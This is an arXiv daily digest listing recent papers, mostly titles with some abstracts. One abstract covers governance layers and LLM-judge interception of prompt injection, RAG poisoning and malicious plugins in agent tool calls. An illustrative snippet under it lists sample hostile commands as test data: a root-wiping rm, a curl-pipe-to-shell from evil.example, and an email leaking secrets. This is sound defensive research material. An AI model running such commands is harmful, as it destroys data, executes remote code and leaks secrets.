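arXivDaily daily academic digest: synced with the full arXiv dataset, with AI summaries and translations, covering artificial intelligence, robotics, computer science, finance, statistics, mathematics, physics, biology, economics, electrical engineering & systems, and more.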

2603.09296 2026-03-11 cs.IR cs.CL

Diagnosing and Repairing Citation Failures in Generative Engine Optimization

Zhihua Tian, Yuhan Chen, Yao Tang, Jian Liu, Ruoxi Jia

Comments 35 pages

Details

English abstract

Generative Engine Optimization (GEO) aims to improve content visibility in AI-generated responses. However, existing methods measure contribution (how much a document influences a response) rather than citation, the mechanism that actually drives traffic back to creators. Also, these methods apply generic rewriting rules uniformly, failing to diagnose why individual documents are not cited. This paper introduces a diagnostic approach to GEO that asks why a document fails to be cited and intervenes accordingly. We develop a unified framework comprising: (1) the first taxonomy of citation failure modes spanning different stages of a citation pipeline; (2) AgentGEO, an agentic system that diagnoses failures using this taxonomy, selects targeted repairs from a corresponding tool library, and iterates until citation is achieved; and (3) a document-centric benchmark evaluating whether optimizations generalize across held-out queries. AgentGEO achieves over 40% relative improvement in citation rates while modifying only 5% of content, compared to 25% for baselines. Our analysis reveals that generic optimization can harm long-tail content and that some documents face challenges that optimization alone cannot fully address, findings with implications for equitable visibility in AI-mediated information access.

2603.09251 2026-03-11 stat.ML cs.LG cs.NA math.NA

A Generative Sampler for distributions with possible discrete parameter based on Reversibility

Lei Li, Zhen Wang, Lishuo Zhang

2603.09174 2026-03-11 eess.SY cs.AI cs.LG cs.SY

Differentiable Stochastic Traffic Dynamics: Physics-Informed Generative Modelling in Transportation

Wuping Xin

Comments 29 pages

2603.09162 2026-03-11 astro-ph.IM cs.CV eess.IV

POLISH'ing the Sky: Wide-Field and High-Dynamic Range Interferometric Image Reconstruction with Application to Strong Lens Discovery

Zihui Wu, Liam Connor, Samuel McCarty, Katherine L. Bouman

2603.08640 2026-03-11 cs.SE cs.AI cs.LG

PostTrainBench: Can LLM Agents Automate LLM Post-Training?

Ben Rank, Hardik Bhatnagar, Ameya Prabhu, Shira Eisenberg, Karina Nguyen, Matthias Bethge, Maksym Andriushchenko

2603.08316 2026-03-11 cs.CR cs.CL cs.CV

SlowBA: An efficiency backdoor attack towards VLM-based GUI agents

Junxian Li, Tu Lan, Haozhen Tan, Yan Meng, Haojin Zhu

Comments 25 pages

2603.08163 2026-03-11 cs.DC cs.LG

Covenant-72B: Pre-Training a 72B LLM with Trustless Peers Over-the-Internet

Joel Lidin, Amir Sarfi, Erfan Miahi, Quentin Anthony, Shivam Chauhan, Evangelos Pappas, Benjamin Thérien, Eugene Belilovsky, Samuel Dare

Comments 26 pages, 6 figures, 4 tables; minor update, no content changes

2603.07685 2026-03-11 cs.DC cs.CL cs.LG

Scalable Training of Mixture-of-Experts Models with Megatron Core

Zijie Yan, Hongxiao Bai, Xin Yao, Dennis Liu, Tong Liu, Hongbin Liu, Pingtian Li, Evan Wu, Shiqing Fan, Li Tao, Robin Zhang, Yuzhong Wang, Shifang Xu, Jack Chang, Xuwen Chen, Kunlun Li, Yan Bai, Gao Deng, Nan Zheng, Vijay Anand Korthikanti, Abhinav Khattar, Ethan He, Soham Govande, Sangkug Lym, Zhongbo Zhu, Qi Zhang, Haochen Yuan, Xiaowei Ren, Deyu Fu, Tailai Ma, Shunkang Zhang, Jiang Shao, Ray Wang, Vasudevan Rengasamy, Rachit Garg, Santosh Bhavani, Xipeng Li, Chandler Zhou, David Wu, Yingcan Wei, Ashwath Aithal, Michael Andersch, Mohammad Shoeybi, Jiajie Yao, June Yang

Comments Technical Report. 88 pages. 42 figures

2603.07191 2026-03-11 cs.CR cs.AI

Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

Yuxu Ge

Comments 22 pages, 2 figures, 10 tables

Details

English abstract

Autonomous agents powered by large language models introduce a class of execution-layer vulnerabilities -- prompt injection, retrieval poisoning, and uncontrolled tool invocation -- that existing guardrails fail to address systematically. In this work, we propose the Layered Governance Architecture (LGA), a four-layer framework comprising execution sandboxing (L1), intent verification (L2), zero-trust inter-agent authorization (L3), and immutable audit logging (L4). To evaluate LGA, we construct a bilingual benchmark (Chinese original, English via machine translation) of 1,081 tool-call samples -- covering prompt injection, RAG poisoning, and malicious skill plugins -- and apply it to OpenClaw, a representative open-source agent framework. Experimental results on Layer 2 intent verification with four local LLM judges (Qwen3.5-4B, Llama-3.1-8B, Qwen3.5-9B, Qwen2.5-14B) and one cloud judge (GPT-4o-mini) show that all five LLM judges intercept 93.0-98.5% of TC1/TC2 malicious tool calls, while lightweight NLI baselines remain below 10%. TC3 (malicious skill plugins) proves harder at 75-94% IR among judges with meaningful precision-recall balance, motivating complementary enforcement at Layers 1 and 3. Qwen2.5-14B achieves the best local balance (98% IR, approximately 10-20% FPR); a two-stage cascade (Qwen3.5-9B->GPT-4o-mini) achieves 91.9-92.6% IR with 1.9-6.7% FPR; a fully local cascade (Qwen3.5-9B->Qwen2.5-14B) achieves 94.7-95.6% IR with 6.0-9.7% FPR for data-sovereign deployments. An end-to-end pipeline evaluation (n=100) demonstrates that all four layers operate in concert with 96% IR and a total P50 latency of approximately 980 ms, of which the non-judge layers contribute only approximately 18 ms. Generalization to the external InjecAgent benchmark yields 99-100% interception, confirming robustness beyond our synthetic data.
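
The cascade figures above can be read through a small sketch. The abstract does not state how the two judges are combined, so the rule used here is an assumption: a call is blocked only when the first judge flags it and the second judge confirms, which would be consistent with the lower FPR reported for the cascades. The judges are hypothetical keyword stubs standing in for LLM calls, and the six samples are invented for illustration; they are not from the paper's benchmark.

```python
from typing import Callable, Iterable, List, Tuple

# A judge returns True when a tool call looks malicious (hypothetical interface).
Judge = Callable[[str], bool]


def cascade(first: Judge, second: Judge) -> Judge:
    """Assumed rule: block only if both judges flag the call.

    `and` short-circuits, so the second judge runs only on escalated calls.
    """
    def judge(tool_call: str) -> bool:
        return first(tool_call) and second(tool_call)
    return judge


def interception_and_fpr(judge: Judge,
                         samples: Iterable[Tuple[str, bool]]) -> Tuple[float, float]:
    """Interception rate (IR) on malicious calls, false-positive rate (FPR) on benign ones."""
    samples = list(samples)
    malicious: List[str] = [call for call, is_bad in samples if is_bad]
    benign: List[str] = [call for call, is_bad in samples if not is_bad]
    ir = sum(judge(call) for call in malicious) / len(malicious)
    fpr = sum(judge(call) for call in benign) / len(benign)
    return ir, fpr


# Toy stand-ins for LLM judges: a permissive first stage and a stricter second stage.
def permissive_judge(call: str) -> bool:
    return any(token in call for token in ("rm", "curl", "secrets"))


def strict_judge(call: str) -> bool:
    return any(token in call for token in ("rm -rf /", "| sh", "evil.example"))


# Invented (tool_call, is_malicious) pairs, for illustration only.
SAMPLES = [
    ("rm -rf / --no-preserve-root", True),
    ("curl http://evil.example/x.sh | sh", True),
    ("send_email(to='ext@mail.example', body=secrets)", True),
    ("ls -la /tmp", False),
    ("rm build/cache.tmp", False),
    ("curl https://api.example.com/status", False),
]

single_ir, single_fpr = interception_and_fpr(permissive_judge, SAMPLES)
cascade_ir, cascade_fpr = interception_and_fpr(
    cascade(permissive_judge, strict_judge), SAMPLES)
```

On this toy data the permissive judge alone intercepts every malicious call but also blocks two of the three benign ones, while the cascade blocks no benign calls and misses one malicious call. That is the same direction of trade-off as the reported numbers, not a reproduction of them.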

2603.06731 2026-03-11 cs.PL cs.LG

PolyBlocks: A Compiler Infrastructure for AI Chips and Programming Frameworks

Uday Bondhugula, Akshay Baviskar, Navdeep Katel, Vimal Patel, Anoop JS, Arnab Dutta

Comments Fixed the "Acknowledgments" section that was missing phrases

2603.02154 2026-03-11 cs.MA cs.AI

Boltzmann-based Exploration for Robust Decentralized Multi-Agent Planning (Extended Version)

Nhat D. A. Nguyen, Duong D. Nguyen, Gianluca Rizzo, Hung X. Nguyen

Comments To appear in ICAPS 2026

2603.02030 2026-03-11 eess.AS cs.LG

TCG CREST System Description for the DISPLACE-M Challenge

Nikhil Raghav, Md Sahidullah

Comments Report submitted for the DISPLACE-M challenge

2603.00945 2026-03-11 math.OC cs.LG stat.ML

Non-Rectangular Average-Reward Robust MDPs: Optimal Policies and Their Transient Values

Shengbo Wang, Nian Si

2602.15484 2026-03-11 eess.AS cs.LG eess.SP

Bottleneck Transformer-Based Approach for Improved Automatic STOI Score Prediction

Amartyaveer, Murali Kadambi, Chandra Mohan Sharma, Anupam Mondal, Prasanta Kumar Ghosh

Comments 7 pages, 7 tables, 2 figures, ASRU 2025

2602.12236 2026-03-11 cs.NE cs.AI cs.CV

Energy-Aware Spike Budgeting for Continual Learning in Spiking Neural Networks for Neuromorphic Vision

Anika Tabassum Meem, Muntasir Hossain Nadid, Md Zesun Ahmed Mia

2601.05355 2026-03-11 stat.ML cs.AI cs.LG stat.CO stat.ME

An AI-powered Bayesian Generative Modeling Approach for Arbitrary Conditional Inference

Qiao Liu, Wing Hung Wong

2512.13870 2026-03-11 eess.SP cs.LG cs.SY eess.SY

Do Spatial Descriptors Improve Multi-DoF Finger Movement Decoding from HD sEMG?

Ricardo Gonçalves Molinari, Leonardo Abdala Elias

Comments 14 pages, 12 figures, 1 table

2512.03636 2026-03-11 cs.HC cs.SD eess.AS

Head, posture, and full-body gestures in unscripted dyadic conversations in noise

Ľuboš Hládek, Bernhard U. Seeber

Comments 7 figures, 12 tables, 36 pages. MS heavily revised for clarity, discussion part extended. Annotation data for one participant was revised - some missing labels were added to the annotation

Details

English abstract

Visual prosody may be critical for communication success in face-to-face conversations in noisy settings. Here, we explore the involvement of hand, head, and whole-body movements, as well as gesturing quality, in dyadic conversations in noisy settings. We hypothesize that increasing background noise would alter the frequency of conversation-related movements to support the roles of the speaker and the listener. Specifically, talkers may increase gesticulation and thus the use of hand, head, trunk, or leg movements more often, while listeners may increase backchanneling or head and trunk movements to improve the signal-to-noise ratio. Additionally, we test whether the synchrony between speech and hand gestures is affected by background noise. Here, pairs of normal hearing participants (n=8) stood in an audiovisual virtual environment while talking freely. The conversational movements were described using a newly developed labeling system with categories that respect their communicative function. The results showed a higher gesturing rate during speaking than during listening. Increased levels of background noise led to increased hand-gesture complexity, modulation of head movements, and a change in trunk movements. People spoke 0.7-1.4 dB louder during hand gesturing in comparison to times with static drop posture, but this was unrelated to the presence of background noise. The analysis of hand-speech synchrony showed a modest decrease in synchrony at the moderate noise level. People adapt their communicative behavior to increased background noise levels by increases in speech production levels and gesturing, which may drive an additional increase in speech production due to biomechanical coupling; listeners may increase backchanneling to support the exchange and their own signal-to-noise ratio. The synchrony analysis may reflect motivational factors of communication in noisy environments.

2512.00359 2026-03-11 physics.plasm-ph cs.LG

An Interpretable Operator-Learning Model for Electric Field Profile Reconstruction in Discharges Based on the EFISH Method

Zhijian Yang, Edwin Setiadi Sugeng, Mhedine Alicherif, Tat Loon Chng

Details

DOI: 10.1088/1361-6595/ae413f
Journal ref: Plasma Sources Sci. Technol. 35 025035 (2026)

English abstract

Machine learning (ML) models have recently been used to reconstruct electric field distributions from EFISH signal profiles (the 'inverse EFISH problem'). This addresses the line-of-sight EFISH inaccuracy caused by the Gouy phase shift in focused beams. A key benefit of this approach is that the accuracy of the reconstructed profile can be directly checked via a 'forward transform' of the EFISH equation. Motivated by this latest success, the present study introduces a novel ML model with markedly improved performance. Based on a more powerful operator-learning architecture, it goes beyond the ANNs and CNNs employed previously. Termed Decoder-DeepONet (DDON), its main strength is learning function-to-function mappings, essential for recovering electric field profiles of unknown shape. The superior performance of DDON is exemplified via a comparison with our published CNN model and the feasibility of a classical mathematical method, as well as its application to both discharge simulations and experimental EFISH data from a nanosecond pulsed discharge. In almost all cases, the DDON model exhibits better generalizability, higher prediction accuracy, and wider applicability. Furthermore, the intrinsic nature of this operator-learning architecture renders it less sensitive to the exact location(s) of the acquired data, enabling electric field reconstruction even with seemingly 'incomplete' input profiles, an issue often accompanying poor signal sensitivity. We also employ Integrated Gradients (IG) to identify the signal regions most critical to reconstruction accuracy, providing guidance on the optimal sampling window for EFISH acquisition. Overall, we believe that the DDON model is a robust and comprehensive model which can be readily applied to reconstruct 'bell-shaped' electric field profiles with an existing axis of symmetry, especially in non-equilibrium plasmas.

2511.11687 2026-03-11 cs.CY cs.CL

Does Scientific Writing Converge to U.S. English? Evidence from Generative AI-Assisted Publications

Dragan Filimonovic, Christian Rutzer, Jeffrey Macher, Rolf Weder

2509.14093 2026-03-11 cs.SE cs.AI cs.CL

Reasoning Efficiently Through Adaptive Chain-of-Thought Compression: A Self-Optimizing Framework

Kerui Huang, Shuhan Liu, Xing Hu, Tongtong Xu, Lingfeng Bao, Xin Xia

2509.10166 2026-03-11 stat.ML cs.LG

Repulsive Monte Carlo on the sphere for the sliced Wasserstein distance

Vladimir Petrovic, Rémi Bardenet, Agnès Desolneux

Details

English abstract

In this paper, we consider the problem of computing the integral of a function on the unit sphere, in any dimension, using Monte Carlo methods. Although the methods we present are general, our guiding thread is the sliced Wasserstein distance between two measures on $\mathbb{R}^d$, which is precisely an integral on the $d$-dimensional sphere. The sliced Wasserstein distance (SW) has gained momentum in machine learning either as a proxy to the less computationally tractable Wasserstein distance, or as a distance in its own right, due in particular to its built-in alleviation of the curse of dimensionality. There have been recent numerical benchmarks of quadratures for the sliced Wasserstein, and our viewpoint differs in that we concentrate on quadratures where the nodes are repulsive, i.e. negatively dependent. Indeed, negative dependence can bring variance reduction when the quadrature is adapted to the integration task. Our first contribution is to extract and motivate quadratures from the recent literature on determinantal point processes (DPPs) and repelled point processes, as well as repulsive quadratures from the literature specific to the sliced Wasserstein distance. We then numerically benchmark these quadratures. Moreover, we analyze the variance of the UnifOrtho estimator, an orthogonal Monte Carlo estimator. Our analysis sheds light on UnifOrtho's success for the estimation of the sliced Wasserstein in large dimensions, as well as counterexamples from the literature. Our final recommendation for the computation of the sliced Wasserstein distance is to use randomized quasi-Monte Carlo in low dimensions and UnifOrtho in large dimensions. DPP-based quadratures only shine when quasi-Monte Carlo also does, while repelled quadratures show moderate variance reduction in general, but more theoretical effort is needed to make them robust.
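
To make the contrast between independent and orthogonal directions concrete, here is a minimal NumPy sketch of a Monte Carlo estimate of the squared sliced 2-Wasserstein distance between two equal-sized point clouds. It is written in the spirit of an orthogonal Monte Carlo estimator and is not the paper's code: the function names are hypothetical, and the assumption is that directions are drawn in blocks of $d$ orthonormal vectors taken from a Haar-distributed orthogonal matrix (QR of a Gaussian matrix with a sign correction).

```python
import numpy as np


def iid_directions(n_dirs: int, d: int, rng: np.random.Generator) -> np.ndarray:
    """Independent uniform directions on the unit sphere of R^d, one per row."""
    g = rng.standard_normal((n_dirs, d))
    return g / np.linalg.norm(g, axis=1, keepdims=True)


def orthogonal_directions(n_dirs: int, d: int, rng: np.random.Generator) -> np.ndarray:
    """Directions drawn in blocks of d mutually orthogonal unit vectors."""
    blocks = []
    for _ in range(-(-n_dirs // d)):  # ceil(n_dirs / d) blocks
        q, r = np.linalg.qr(rng.standard_normal((d, d)))
        q = q * np.sign(np.diag(r))  # sign fix so that q is Haar-distributed
        blocks.append(q.T)
    return np.vstack(blocks)[:n_dirs]


def sliced_w2_squared(x: np.ndarray, y: np.ndarray, directions: np.ndarray) -> float:
    """Average over directions of the 1D squared W2 between projected samples.

    Assumes x and y have the same number of points, so the 1D optimal
    coupling simply matches sorted projections.
    """
    px = np.sort(x @ directions.T, axis=0)
    py = np.sort(y @ directions.T, axis=0)
    return float(np.mean((px - py) ** 2))


rng = np.random.default_rng(0)
d = 4
x = rng.standard_normal((50, d))
shift = np.array([1.0, 2.0, 0.0, -1.0])
y = x + shift  # pure translation: the exact value is |shift|^2 / d

estimate_iid = sliced_w2_squared(x, y, iid_directions(8, d, rng))
estimate_ortho = sliced_w2_squared(x, y, orthogonal_directions(8, d, rng))
exact = float(shift @ shift) / d
```

For a pure translation the integrand is a quadratic form in the direction, so any full block of $d$ orthonormal directions recovers the exact value, whereas the i.i.d. estimate fluctuates around it. This is an easy special case chosen to show the effect of negative dependence; it says nothing about how the estimators compare on general measures.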

2508.09535 2026-03-11 cs.MM cs.AI cs.CL cs.DL

AI Blob! LLM-Driven Recontextualization of Italian Television Archives

Roberto Balestri

Comments Preprint

Details

DOI: 10.66062/PHBQ6517
Journal ref: 16th Media Mutations International Conference (pp. 123-133) 2026

English abstract

This paper introduces AI Blob!, an experimental system designed to explore the potential of semantic cataloging and Large Language Models (LLMs) for the retrieval and recontextualization of archival television footage. Drawing methodological inspiration from Italian television programs such as Blob (RAI Tre, 1989-), AI Blob! integrates automatic speech recognition (ASR), semantic embeddings, and retrieval-augmented generation (RAG) to organize and reinterpret archival content. The system processes a curated dataset of 1,547 Italian television videos by transcribing audio, segmenting it into sentence-level units, and embedding these segments into a vector database for semantic querying. Upon user input of a thematic prompt, the LLM generates a range of linguistically and conceptually related queries, guiding the retrieval and recombination of audiovisual fragments. These fragments are algorithmically selected and structured into narrative sequences producing montages that emulate editorial practices of ironic juxtaposition and thematic coherence. By foregrounding dynamic, content-aware retrieval over static metadata schemas, AI Blob! demonstrates how semantic technologies can facilitate new approaches to archival engagement, enabling novel forms of automated narrative construction and cultural analysis. The project contributes to ongoing debates in media historiography and AI-driven archival research, offering both a conceptual framework and a publicly available dataset to support further interdisciplinary experimentation.

2508.08837 2026-03-11 cs.SI cs.AI

Debiasing International Attitudes: LLM Agents for Simulating US-China Perception Changes

Nicholas Sukiennik, Yichuan Xu, Yuqing Kan, Jinghua Piao, Yuwei Yan, Chen Gao, Yong Li

Comments Submitted to TCSS

2508.01555 2026-03-11 eess.IV cs.CV

MGCR-Net: Multimodal Graph-Conditioned Vision-Language Reconstruction Network for Remote Sensing Change Detection

Chengming Wang, Guodong Fan, Jinjiang Li, Min Gan, C. L. Philip Chen

Details

DOI: 10.1109/TGRS.2026.3654629
Journal ref: IEEE Transactions on Geoscience and Remote Sensing, vol. 64, pp. 1-15, 2026, Art no. 4701515

English abstract

With the advancement of remote sensing satellite technology and the rapid progress of deep learning, remote sensing change detection (RSCD) has become a key technique for regional monitoring. Traditional change detection (CD) methods and deep learning-based approaches have made significant contributions to change analysis and detection; however, many outstanding methods still face limitations in the exploration and application of multimodal data. To address this, we propose the multimodal graph-conditioned vision-language reconstruction network (MGCR-Net) to further explore the semantic interaction capabilities of multimodal data. Multimodal large language models (MLLM) have attracted widespread attention for their outstanding performance in computer vision, particularly due to their powerful visual-language understanding and dialogic interaction capabilities. Specifically, we design an MLLM-based optimization strategy to generate multimodal textual data from the original CD images, which serve as textual input to MGCR. Visual and textual features are extracted through a dual encoder framework. For the first time in the RSCD task, we introduce a multimodal graph-conditioned vision-language reconstruction mechanism, which is integrated with graph attention to construct a semantic graph-conditioned reconstruction module (SGCM). This module generates vision-language (VL) tokens through graph-based conditions and enables cross-dimensional interaction between visual and textual features via multihead attention. The reconstructed VL features are then deeply fused using the language vision transformer (LViT), achieving fine-grained feature alignment and high-level semantic interaction. Experimental results on four public datasets demonstrate that MGCR achieves superior performance compared to mainstream CD methods. Our code is available at https://github.com/cn-xvkong/MGCR

2507.10179 2026-03-11 math.HO cs.AI

On the mechanical creation of mathematical concepts

Asvin G

Comments A complete rewrite of the paper

2506.23553 2026-03-11 eess.AS cs.SD

Human-CLAP: Human-perception-based contrastive language-audio pretraining

Taisei Takano, Yuki Okamoto, Yusuke Kanamori, Yuki Saito, Ryotaro Nagase, Hiroshi Saruwatari

Comments Submitted to APSIPA ASC 2025

2506.20533 2026-03-11 stat.ML cs.LG math.OC

Global Convergence of Iteratively Reweighted Least Squares for Robust Subspace Recovery

Gilad Lerman, Kang Li, Tyler Maunu, Teng Zhang

2506.12842 2026-03-11 cs.SI cs.LG stat.ML

Uncovering Social Network Activity Using Joint User and Topic Interaction

Gaspard Abel, Argyris Kalogeratos, Jean-Pierre Nadal, Julien Randon-Furling

Comments Content: 13 pages, 8 figures, 4 tables

2506.04265 2026-03-11 cs.MA cs.AI cs.GT cs.LG

Cooperative Game-Theoretic Credit Assignment for Multi-Agent Policy Gradients via the Core

Mengda Ji, Genjiu Xu, Keke Jia, Zekun Duan, Yong Qiu, Jianjun Ge, Mingqiang Li